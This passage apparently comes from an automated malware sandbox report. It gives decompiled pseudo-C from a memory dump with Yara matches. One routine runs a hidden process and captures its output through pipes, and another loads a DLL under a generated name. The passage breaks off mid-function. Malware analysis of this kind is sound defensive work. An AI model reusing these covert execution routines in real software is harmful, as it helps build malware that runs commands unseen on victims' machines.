                                                                                                                                                                                                • Instruction Fuzzy Hash: EA014735800205AFDB022FA4E90D7997FE4EF4A3A0F2101D0E980772E1CF74996CC7A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                			E00AFA9F9(signed int __ecx) {
                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES _v48;
                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                				intOrPtr _v76;
                                                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                                                				void* _v84;
                                                                                                                                                                                                				short _v92;
                                                                                                                                                                                                				intOrPtr _v96;
                                                                                                                                                                                                				void _v140;
                                                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                                                				void* _t79;
                                                                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                                                                				intOrPtr _t92;
                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                				intOrPtr _t100;
                                                                                                                                                                                                				intOrPtr _t102;
                                                                                                                                                                                                				long _t111;
                                                                                                                                                                                                				intOrPtr _t115;
                                                                                                                                                                                                				intOrPtr _t126;
                                                                                                                                                                                                				void* _t127;
                                                                                                                                                                                                				void* _t128;
                                                                                                                                                                                                				void* _t129;
                                                                                                                                                                                                				void* _t130;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t111 = 0;
                                                                                                                                                                                                				_v24 = __ecx;
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                				_t127 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				_v48.nLength = 0xc;
                                                                                                                                                                                                				_v48.lpSecurityDescriptor = 0;
                                                                                                                                                                                                				_v48.bInheritHandle = 1;
                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                				memset( &_v140, 0, 0x44);
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t130 = _t129 + 0xc;
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                                                                                                                                                                                					L18:
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                                                                                                                                                                                					L13:
                                                                                                                                                                                                					E00AF85FB( &_v28, 0);
                                                                                                                                                                                                					if(_v20 != 0) {
                                                                                                                                                                                                						_t77 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                						_t115 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _t111;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t79 = _v16;
                                                                                                                                                                                                				_v76 = _t79;
                                                                                                                                                                                                				_v80 = _t79;
                                                                                                                                                                                                				_v84 = _v12;
                                                                                                                                                                                                				_v140 = 0x44;
                                                                                                                                                                                                				_v96 = 0x101;
                                                                                                                                                                                                				_v92 = 0;
                                                                                                                                                                                                				_t126 = E00AF85E5(0x1001);
                                                                                                                                                                                                				_v28 = _t126;
                                                                                                                                                                                                				if(_t126 == 0) {
                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push( &_v64);
                                                                                                                                                                                                				_push( &_v140);
                                                                                                                                                                                                				_t85 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0x8000000);
                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(_v24);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t87 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                                                                                                                                                                                				_t89 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                                                                                                                                                                                				_v24 = _v24 & 0;
                                                                                                                                                                                                				do {
                                                                                                                                                                                                					_t92 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                                                                                                                                                                                					 *((char*)(_v24 + _t126)) = 0;
                                                                                                                                                                                                					if(_t111 == 0) {
                                                                                                                                                                                                						_t127 = E00AF9187(_t126, 0);
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push(_t126);
                                                                                                                                                                                                						_v32 = _t127;
                                                                                                                                                                                                						_t127 = E00AF9273(_t127);
                                                                                                                                                                                                						E00AF85FB( &_v32, 0xffffffff);
                                                                                                                                                                                                						_t130 = _t130 + 0x14;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t111 = _t127;
                                                                                                                                                                                                					_v32 = _t127;
                                                                                                                                                                                                				} while (_v36 != 0);
                                                                                                                                                                                                				_push( &_v36);
                                                                                                                                                                                                				_push(E00AFC3BB(_t127));
                                                                                                                                                                                                				_t98 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                				_push(_t127);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                                                                                                                                                                                					L12:
                                                                                                                                                                                                					_t100 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                                                                                                                                                                                					_t102 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t128 = E00AF9237(_t127);
                                                                                                                                                                                                				if(_t128 == 0) {
                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E00AF85FB( &_v32, 0);
                                                                                                                                                                                                				return _t128;
                                                                                                                                                                                                			}


                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFAA36
                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 00AFAA5A
                                                                                                                                                                                                • CreatePipe.KERNEL32(00AF658A,?,0000000C,00000000), ref: 00AFAA71
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                  • Part of subcall function 00AF85FB: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateHeapPipe$AllocateFreememset
                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                • API String ID: 2365139273-2746444292
                                                                                                                                                                                                • Opcode ID: 8a0edd504a4aca0c33488d3588530eb8dbe141d75654ec1c537755dccda4d753
                                                                                                                                                                                                • Instruction ID: c69a56017d3cd821f736708f9bd98eced512084c8247d4f5a8c4baf2e5cab65d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a0edd504a4aca0c33488d3588530eb8dbe141d75654ec1c537755dccda4d753
                                                                                                                                                                                                • Instruction Fuzzy Hash: B85147B2D00209AFDB11DFE8DD85FEEB7B9AB18300F10416AF614E7251EB759A05CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                			E00AFC510(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				void _v140;
                                                                                                                                                                                                				signed char _t14;
                                                                                                                                                                                                				char _t15;
                                                                                                                                                                                                				intOrPtr _t20;
                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                				WCHAR* _t34;
                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                				struct HINSTANCE__* _t37;
                                                                                                                                                                                                				int _t38;
                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                				void* _t60;
                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                				char _t62;
                                                                                                                                                                                                				char* _t63;
                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                				char _t68;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t65 = __esi;
                                                                                                                                                                                                				_t61 = __edi;
                                                                                                                                                                                                				_t47 = __ebx;
                                                                                                                                                                                                				_t50 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				_t14 =  *(_t50 + 0x1898);
                                                                                                                                                                                                				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                                                					_t15 = E00AF95C2(_t50, 0xb62);
                                                                                                                                                                                                					_t66 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					_t62 = _t15;
                                                                                                                                                                                                					_t67 = _t66 + 0xb0;
                                                                                                                                                                                                					_v8 = _t62;
                                                                                                                                                                                                					E00AF9621( &_v140, 0x40, L"%08x", E00AFD442(_t66 + 0xb0, E00AFC3BB(_t66 + 0xb0), 0));
                                                                                                                                                                                                					_t20 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					asm("sbb eax, eax");
                                                                                                                                                                                                					_t25 = E00AF95C2(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                                                                                                                                                                                					_t63 = "\\";
                                                                                                                                                                                                					_t26 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					_t68 = E00AF92C6(_t26 + 0x1020);
                                                                                                                                                                                                					_v12 = _t68;
                                                                                                                                                                                                					E00AF85B6( &_v8);
                                                                                                                                                                                                					_t32 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					_t34 = E00AF92C6(_t32 + 0x122a);
                                                                                                                                                                                                					 *0xb0e784 = _t34;
                                                                                                                                                                                                					_t35 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                                                					_t37 = LoadLibraryW( *0xb0e784);
                                                                                                                                                                                                					 *0xb0e77c = _t37;
                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                						_t38 = 0;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_push(_t37);
                                                                                                                                                                                                						_t60 = 0x28;
                                                                                                                                                                                                						_t38 = E00AFE1B3(0xb0bb40, _t60);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					 *0xb0e780 = _t38;
                                                                                                                                                                                                					E00AF85FB( &_v12, 0xfffffffe);
                                                                                                                                                                                                					memset( &_v140, 0, 0x80);
                                                                                                                                                                                                					if( *0xb0e780 != 0) {
                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						E00AF85FB(0xb0e784, 0xfffffffe);
                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					L8:
                                                                                                                                                                                                					if( *0xb0e780 == 0) {
                                                                                                                                                                                                						_t46 =  *0xb0e6bc; // 0x4d3f7f0
                                                                                                                                                                                                						 *0xb0e780 = _t46;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L10:
                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}



























                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoadmemset
                                                                                                                                                                                                • String ID: %08x$dll
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 99%
                                                                                                                                                                                                			E00B02DB0(int _a4, signed int _a8) {
                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                				void* _t137;
                                                                                                                                                                                                				signed int _t141;
                                                                                                                                                                                                				intOrPtr* _t142;
                                                                                                                                                                                                				signed int _t145;
                                                                                                                                                                                                				signed int _t146;
                                                                                                                                                                                                				intOrPtr _t151;
                                                                                                                                                                                                				intOrPtr _t161;
                                                                                                                                                                                                				intOrPtr _t162;
                                                                                                                                                                                                				intOrPtr _t167;
                                                                                                                                                                                                				intOrPtr _t170;
                                                                                                                                                                                                				signed int _t172;
                                                                                                                                                                                                				intOrPtr _t173;
                                                                                                                                                                                                				int _t184;
                                                                                                                                                                                                				intOrPtr _t185;
                                                                                                                                                                                                				intOrPtr _t188;
                                                                                                                                                                                                				signed int _t189;
                                                                                                                                                                                                				void* _t195;
                                                                                                                                                                                                				int _t202;
                                                                                                                                                                                                				int _t208;
                                                                                                                                                                                                				intOrPtr _t217;
                                                                                                                                                                                                				signed int _t218;
                                                                                                                                                                                                				int _t219;
                                                                                                                                                                                                				intOrPtr _t220;
                                                                                                                                                                                                				signed int _t221;
                                                                                                                                                                                                				signed int _t222;
                                                                                                                                                                                                				int _t224;
                                                                                                                                                                                                				int _t225;
                                                                                                                                                                                                				signed int _t227;
                                                                                                                                                                                                				intOrPtr _t228;
                                                                                                                                                                                                				int _t232;
                                                                                                                                                                                                				int _t234;
                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                				int _t239;
                                                                                                                                                                                                				void* _t240;
                                                                                                                                                                                                				int _t245;
                                                                                                                                                                                                				int _t252;
                                                                                                                                                                                                				signed int _t253;
                                                                                                                                                                                                				int _t254;
                                                                                                                                                                                                				void* _t257;
                                                                                                                                                                                                				void* _t258;
                                                                                                                                                                                                				int _t259;
                                                                                                                                                                                                				intOrPtr _t260;
                                                                                                                                                                                                				int _t261;
                                                                                                                                                                                                				signed int _t269;
                                                                                                                                                                                                				signed int _t271;
                                                                                                                                                                                                				intOrPtr* _t272;
                                                                                                                                                                                                				void* _t273;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t253 = _a8;
                                                                                                                                                                                                				_t272 = _a4;
                                                                                                                                                                                                				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                                				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                				_t228 =  *_t4;
                                                                                                                                                                                                				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                                                				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                                                				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                                                				_t269 = 0;
                                                                                                                                                                                                				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                                                				asm("o16 nop [eax+eax]");
                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                					_t8 = _t272 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                                                					_v12 = 0xffff;
                                                                                                                                                                                                					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                                                					if(_t217 < _t141) {
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                					_t12 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                                                					_v8 = _t245;
                                                                                                                                                                                                					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                                                					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                                                					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                                                					if(_t227 >= _v16) {
                                                                                                                                                                                                						L7:
                                                                                                                                                                                                						if(_t253 != 4) {
                                                                                                                                                                                                							L10:
                                                                                                                                                                                                							_t269 = 0;
                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t285 = _t227 - _t195;
                                                                                                                                                                                                							if(_t227 != _t195) {
                                                                                                                                                                                                								goto L10;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t269 = _t253 - 3;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E00B05DD0(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                                                						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                                                						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                                                						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                                                						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                                                						E00B04B30(_t285,  *_t272);
                                                                                                                                                                                                						_t202 = _v8;
                                                                                                                                                                                                						_t273 = _t273 + 0x14;
                                                                                                                                                                                                						if(_t202 != 0) {
                                                                                                                                                                                                							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                                                							_v8 = _t208;
                                                                                                                                                                                                							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                							_t37 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                							_t252 = _v8;
                                                                                                                                                                                                							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                                                							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                                                							_t227 = _t227 - _t252;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_t227 != 0) {
                                                                                                                                                                                                							E00B04C70( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t253 = _a8;
                                                                                                                                                                                                						if(_t269 == 0) {
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                                                							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                                                								goto L7;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					break;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t142 =  *_t272;
                                                                                                                                                                                                				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                                                				_a4 = _t232;
                                                                                                                                                                                                				if(_t232 == 0) {
                                                                                                                                                                                                					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                					_t254 =  *_t83;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                					_t224 =  *_t59;
                                                                                                                                                                                                					if(_t232 < _t224) {
                                                                                                                                                                                                						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                                						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                						_t260 =  *_t66;
                                                                                                                                                                                                						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                                                						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                                                							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                							_t261 = _t260 - _t224;
                                                                                                                                                                                                							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                                                							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                                                							_t70 = _t272 + 0x16b0; // 0x7e89ffff
                                                                                                                                                                                                							_t188 =  *_t70;
                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                							_t232 = _a4;
                                                                                                                                                                                                							__eflags = _t188 - 2;
                                                                                                                                                                                                							if(_t188 < 2) {
                                                                                                                                                                                                								_t189 = _t188 + 1;
                                                                                                                                                                                                								__eflags = _t189;
                                                                                                                                                                                                								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                                                						_t225 = _a4;
                                                                                                                                                                                                						_t273 = _t273 + 0xc;
                                                                                                                                                                                                						_t76 = _t272 + 0x6c;
                                                                                                                                                                                                						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                                                						__eflags =  *_t76;
                                                                                                                                                                                                						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                						_t184 =  *_t78;
                                                                                                                                                                                                						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                						_t239 =  *_t79;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                                                						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                                                						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                						_t184 =  *_t62;
                                                                                                                                                                                                						_t273 = _t273 + 0xc;
                                                                                                                                                                                                						_t225 = _a4;
                                                                                                                                                                                                						_t239 = _t184;
                                                                                                                                                                                                						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t254 = _t184;
                                                                                                                                                                                                					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                                                					_t81 = _t272 + 0x16b4; // 0x3c468b3c
                                                                                                                                                                                                					_t185 =  *_t81;
                                                                                                                                                                                                					_t240 = _t239 - _t185;
                                                                                                                                                                                                					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                                                					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                                					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                                                					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(_t269 == 0) {
                                                                                                                                                                                                					_t218 = _a8;
                                                                                                                                                                                                					__eflags = _t218;
                                                                                                                                                                                                					if(_t218 == 0) {
                                                                                                                                                                                                						L34:
                                                                                                                                                                                                						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                                						_t219 =  *_t272;
                                                                                                                                                                                                						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                                                						_a4 =  *_t272;
                                                                                                                                                                                                						_t234 = _t254;
                                                                                                                                                                                                						_v16 = _t145;
                                                                                                                                                                                                						_v8 = _t254;
                                                                                                                                                                                                						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                                                						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                                                							_v8 = _t254;
                                                                                                                                                                                                							_t95 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                							_a4 = _t219;
                                                                                                                                                                                                							_t234 = _t254;
                                                                                                                                                                                                							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                                                							if( *_t95 >=  *_t97) {
                                                                                                                                                                                                								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                								_t167 =  *_t98;
                                                                                                                                                                                                								_t259 = _t254 - _t167;
                                                                                                                                                                                                								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                                                								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                                                								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                                                								_t103 = _t272 + 0x16b0; // 0x7e89ffff
                                                                                                                                                                                                								_t170 =  *_t103;
                                                                                                                                                                                                								_t273 = _t273 + 0xc;
                                                                                                                                                                                                								__eflags = _t170 - 2;
                                                                                                                                                                                                								if(_t170 < 2) {
                                                                                                                                                                                                									_t172 = _t170 + 1;
                                                                                                                                                                                                									__eflags = _t172;
                                                                                                                                                                                                									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                								_t145 = _v16 +  *_t106;
                                                                                                                                                                                                								__eflags = _t145;
                                                                                                                                                                                                								_a4 =  *_t272;
                                                                                                                                                                                                								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                								_t234 =  *_t108;
                                                                                                                                                                                                								_v8 = _t234;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t255 = _a4;
                                                                                                                                                                                                						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                                                						__eflags = _t145 - _t220;
                                                                                                                                                                                                						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                                                						_t146 = _t221;
                                                                                                                                                                                                						_a4 = _t221;
                                                                                                                                                                                                						_t222 = _a8;
                                                                                                                                                                                                						__eflags = _t146;
                                                                                                                                                                                                						if(_t146 != 0) {
                                                                                                                                                                                                							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                							E00B04C70(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                							_t117 = _t272 + 0x6c;
                                                                                                                                                                                                							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                                                							__eflags =  *_t117;
                                                                                                                                                                                                							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                							_t234 =  *_t119;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                                                						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                                                							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t122 = _t272 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                                						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                                                						__eflags = _t257 - 0xffff;
